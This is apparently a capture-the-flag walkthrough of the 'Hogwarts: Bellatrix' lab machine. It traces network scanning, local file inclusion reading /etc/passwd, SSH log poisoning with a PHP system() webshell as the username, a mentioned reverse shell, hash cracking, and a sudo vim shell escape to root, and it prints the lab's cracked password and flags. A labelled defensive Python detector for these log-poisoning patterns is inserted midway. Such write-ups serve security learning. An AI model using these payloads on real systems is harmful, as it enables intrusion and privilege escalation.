HOGWARTS: BELLATRIX (walkthrough)

MANDEEP KUMAR
4 min read · Jun 29, 2023


This task is a bit different from the others: the machine is provided as a .ova file, which VMware can import. We will set up the machine using these steps:

  1. Import the ‘ova file’ in “VMware Workstation Pro” [Note: the Pro version makes it easy to set up the network settings using the Virtual Network Editor]
  2. Change the network settings after launching the machine:

>click on Edit

> Virtual Network Editor

> Change Settings (bottom right; this grants the permissions needed to change network settings)

> change VMnet0 to bridged type and set the external connection to the host-only Ethernet adapter (I am using VirtualBox to perform this challenge, so I add the VirtualBox host-only adapter)

> click Apply and OK

  3. Now set up the VirtualBox machine network, from which we perform the whole challenge:

>click on the machine's Settings

>go to the Network section

>check the Adapter 1 and Adapter 2 boxes (one for VMware machine access and the other for internet connectivity)

>Adapter 1 settings are: Attached to → Host-only Adapter; Name → VirtualBox Host-Only Ethernet Adapter

>Adapter 2 settings are: Attached to → Bridged Adapter; Name → Intel Wi-Fi 6 (in my case; your main internet adapter name may be different)

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Let's begin the challenge from here.

Phase 1 (on the VirtualBox machine)

ifconfig: this shows the machine IP (192.168.56.108 on eth0 in my case)

First, perform a netdiscover scan to get the target (VMware machine) IP address using sudo netdiscover -P -i eth0 -r 192.168.56.0/24

Our target is the VMware machine.

Check for open ports using the network scanner NMAP with the command

sudo nmap -A -sS -sV 192.168.56.106

Open ports are 22 (ssh) | 80 (http)

Phase 2

Open a browser and browse to the IP address (192.168.56.106 in my case)

Reconnoitre the whole website: check the source code and use Inspect Element.

Information gathered:

“ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php” → last line of the website

/*$file = $_GET['file'];
if(isset($file)){
include("$file");
}*/

→ this is commented out in the source code

This shows we have a page ikilledsiriusblack.php and a script which can take a file name as input.

After searching and reading some other write-ups to understand the hints, it looked like a LOCAL FILE INCLUSION (LFI) vulnerability.

192.168.56.106/ikilledsiriusblack.php?file=/etc/passwd

This URL can be broken down as

/ikilledsiriusblack.php → the vulnerable page

?file=/etc/passwd → the file parameter; if the contents of /etc/passwd come back, the LFI is confirmed

This confirms the LFI vulnerability.

Looking at each line carefully, I got two things:

bellatrix:x:1000:1000:Bellatrix,,,:/home/bellatrix:/bin/bash

lestrange:x:1001:1001::/home/lestrange:/bin/rbash

The bellatrix user has /bin/bash, meaning everything is allowed, and the lestrange user has /bin/rbash, a restricted shell that cannot run all terminal commands…

After learning more about the LOCAL FILE INCLUSION vulnerability, I got to know we can perform log poisoning using two methods:
the Apache access log (for RCE) and the SSH auth log

?file=/var/log/apache2/access.log → RCE this way is not possible, as reading this file is not allowed

?file=/var/log/auth.log → SSH log poisoning is successful

Now that we know SSH log poisoning is possible through this vulnerability, and everything is dumped into a log file that is readable through the LFI, let's try to perform it…

ssh Bellatrix@192.168.56.106 (we don't know the password, and it is not needed)

Doing so, we notice a new entry in the log file. Remember the commented script in the page source… we have to add a PHP script as the SSH username so that whatever we pass to it gets executed.

This PHP script is ‘<?php system($_GET['m'])?>’ (quotes included). I can describe it in detail as:

a PHP snippet for executing any command we pass in the variable ‘m’

> system() is a PHP function that allows the execution of shell commands.

> $_GET['m'] retrieves the value of the query parameter “m” from the URL.

SSH in with the script as the username, then use the variable to get command-line access.
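From the defender's side, this chain leaves two clear footprints: a file= parameter pointing at system or log files in the Apache access log, and PHP tags inside an sshd "Invalid user" entry in auth.log. The detector below is an added example, not part of the original write-up; the log lines are constructed, and the regexes assume the default Apache combined format and Debian-style auth.log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (not captured from the challenge machine).
ACCESS_LOG = [
    '192.168.56.108 - - [29/Jun/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.168.56.108 - - [29/Jun/2023:10:01:09 +0000] "GET /ikilledsiriusblack.php?file=/etc/passwd HTTP/1.1" 200 2048',
    '192.168.56.108 - - [29/Jun/2023:10:02:31 +0000] "GET /ikilledsiriusblack.php?file=/var/log/auth.log&m=id HTTP/1.1" 200 9100',
    '192.168.56.108 - - [29/Jun/2023:10:03:00 +0000] "GET /ikilledsiriusblack.php?file=..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 30',
]
AUTH_LOG = [
    "Jun 29 10:02:10 bellatrix sshd[1234]: Invalid user Bellatrix from 192.168.56.108 port 50111",
    "Jun 29 10:02:20 bellatrix sshd[1240]: Invalid user <?php system($_GET['m'])?> from 192.168.56.108 port 50112",
    "Jun 29 10:05:00 bellatrix sshd[1300]: Accepted password for lestrange from 192.168.56.108 port 50200 ssh2",
]

# Apache combined log: client IP, then the quoted request line and the status code.
REQ_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# sshd records the attempted (non-existent) username verbatim, which is what log poisoning abuses.
INVALID_USER_RE = re.compile(r'Invalid user (?P<user>.*) from (?P<src>\S+) port')
PHP_TAG_RE = re.compile(r'<\?php|<\?=|\?>', re.IGNORECASE)


def lfi_findings(lines):
    """Return (src_ip, file_value, has_cmd_param) for requests whose 'file' parameter
    is an absolute path, traverses upward, or names a log file (the poisoning target)."""
    findings = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group('target')).query)  # parse_qs percent-decodes once
        for val in qs.get('file', []):
            if val.startswith('/') or '../' in val or '/var/log/' in val:
                # An extra 'm' parameter alongside the log include matches the webshell pattern above.
                findings.append((m.group('src'), val, 'm' in qs))
    return findings


def poisoned_usernames(lines):
    """Return (src_ip, username) for SSH login attempts whose username carries PHP tags."""
    hits = []
    for line in lines:
        m = INVALID_USER_RE.search(line)
        if m and PHP_TAG_RE.search(m.group('user')):
            hits.append((m.group('src'), m.group('user')))
    return hits
```

Correlating the two (a PHP-tagged username from the same source IP shortly before a request including /var/log/auth.log with an extra command parameter) gives a high-confidence alert rather than two noisy ones.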

Further exploiting this vulnerability, we can get a reverse shell to our machine's terminal for full access.

We know access to /bin/bash is allowed, so I get a reverse shell with it.

Enumerating each directory manually, I find some useful information:

lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQIdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0

a hash stored in the Swordofgryffindor directory, and also a .secret.dic file containing a wordlist

So at this point I have a hash and a wordlist, along with the user name; let's find the value of the hash using the tool JOHN THE RIPPER

password:ihateharrypotter

SSH to the other user, lestrange, with the password ihateharrypotter. But it is a restricted shell (we already know this from /bin/rbash).

command sudo -l (to see what the user is permitted to run)

(ALL : ALL) NOPASSWD: /usr/bin/vim (means we can use vim to execute our commands)

Bypass it using vim to spawn /bin/bash

sudo vim -c ':!/bin/sh' (: enters vim's command mode, ! executes an external shell command)

Gained full shell access; enumerate to the bellatrix directory and get the user flag:

user: {69e0f71f25ece4351e4d73af430bec43}

But we need to get root, so moving further…

Enumerating the root directory shows a root.txt file which contains

root{ead5a85a11ba466011fced308d460a76}

AND THAT'S THE END OF THE CHALLENGE

THANK YOU for reading till here!

Find me here: https://www.linkedin.com/in/mandeepkumarbanihall/
